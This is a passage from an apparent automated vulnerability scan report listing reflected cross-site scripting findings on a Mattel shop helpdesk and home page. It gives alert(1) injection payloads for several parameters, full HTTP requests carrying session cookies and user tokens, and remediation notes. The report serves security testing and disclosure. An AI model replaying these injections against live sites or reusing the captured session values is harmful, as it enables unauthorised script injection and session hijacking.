GET /helpdesk/index.jsp?display=store11184"-alert(1)-"137cfc99da6&subdisplay=contact HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:40 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 50920
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1. ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
The value of the display request parameter is copied into an HTML comment. The payload ae7c4--><script>alert(1)</script>8529c1ade60 was submitted in the display parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /helpdesk/index.jsp?display=storeae7c4--><script>alert(1)</script>8529c1ade60&subdisplay=contact HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:41 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 50952
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1. ...[SNIP]... <!-- === Request Query String: display=storeae7c4--><script>alert(1)</script>8529c1ade60&subdisplay=contact --> ...[SNIP]...
The value of the jsessionid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47f74"-alert(1)-"bafccbb8a5f was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store47f74"-alert(1)-"bafccbb8a5f&subdisplay=contact HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:38 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 51072
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1. ...[SNIP]... = {}; }
The value of the jsessionid request parameter is copied into an HTML comment. The payload 58f03--><script>alert(1)</script>ff989ba6b7c was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store58f03--><script>alert(1)</script>ff989ba6b7c&subdisplay=contact HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:39 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 51104
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1. ...[SNIP]... <!-- === Request Query String: jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&display=store58f03--><script>alert(1)</script>ff989ba6b7c&subdisplay=contact --> ...[SNIP]...
1.29. http://shop.mattel.com/helpdesk/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/helpdesk/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6b7d"-alert(1)-"374d85b5440 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /helpdesk/index.jsp?a6b7d"-alert(1)-"374d85b5440=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:36 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 50860
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1. ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.30. http://shop.mattel.com/helpdesk/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/helpdesk/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 682a0--><script>alert(1)</script>d018437814a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /helpdesk/index.jsp?682a0--><script>alert(1)</script>d018437814a=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:37 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 50892
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1. ...[SNIP]... <!-- === Request Query String: 682a0--><script>alert(1)</script>d018437814a=1 --> ...[SNIP]...
The value of the stillHaveQuestion request parameter is copied into an HTML comment. The payload 900f6--><script>alert(1)</script>fcf53bf03ee was submitted in the stillHaveQuestion parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&subdisplay=contact&stillHaveQuestion=yes900f6--><script>alert(1)</script>fcf53bf03ee HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:49 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 41092
The value of the stillHaveQuestion request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33980"-alert(1)-"a02d5e30f09 was submitted in the stillHaveQuestion parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&subdisplay=contact&stillHaveQuestion=yes33980"-alert(1)-"a02d5e30f09 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:48 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 41060
The value of the subdisplay request parameter is copied into an HTML comment. The payload 3f282--><script>alert(1)</script>79695b33cda was submitted in the subdisplay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&subdisplay=contact3f282--><script>alert(1)</script>79695b33cda HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:45 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 40113
The value of the subdisplay request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 783bb"-alert(1)-"a156f112195 was submitted in the subdisplay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&subdisplay=contact783bb"-alert(1)-"a156f112195 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:44 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 40048
The value of the jsessionid request parameter is copied into an HTML comment. The payload 8d597--><script>alert(1)</script>d903fe711aa was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /home/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?locale=es_US8d597--><script>alert(1)</script>d903fe711aa HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:53 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 45700
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN ...[SNIP]... <!-- === Request Query String: jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&locale=es_US8d597--><script>alert(1)</script>d903fe711aa --> ...[SNIP]...
The value of the jsessionid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24863"-alert(1)-"78eaf9b6a31 was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?locale=es_US24863"-alert(1)-"78eaf9b6a31 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:52 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 45652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN ...[SNIP]... = {}; }
The value of the locale request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4b57"-alert(1)-"f7a8c4aca52 was submitted in the locale parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
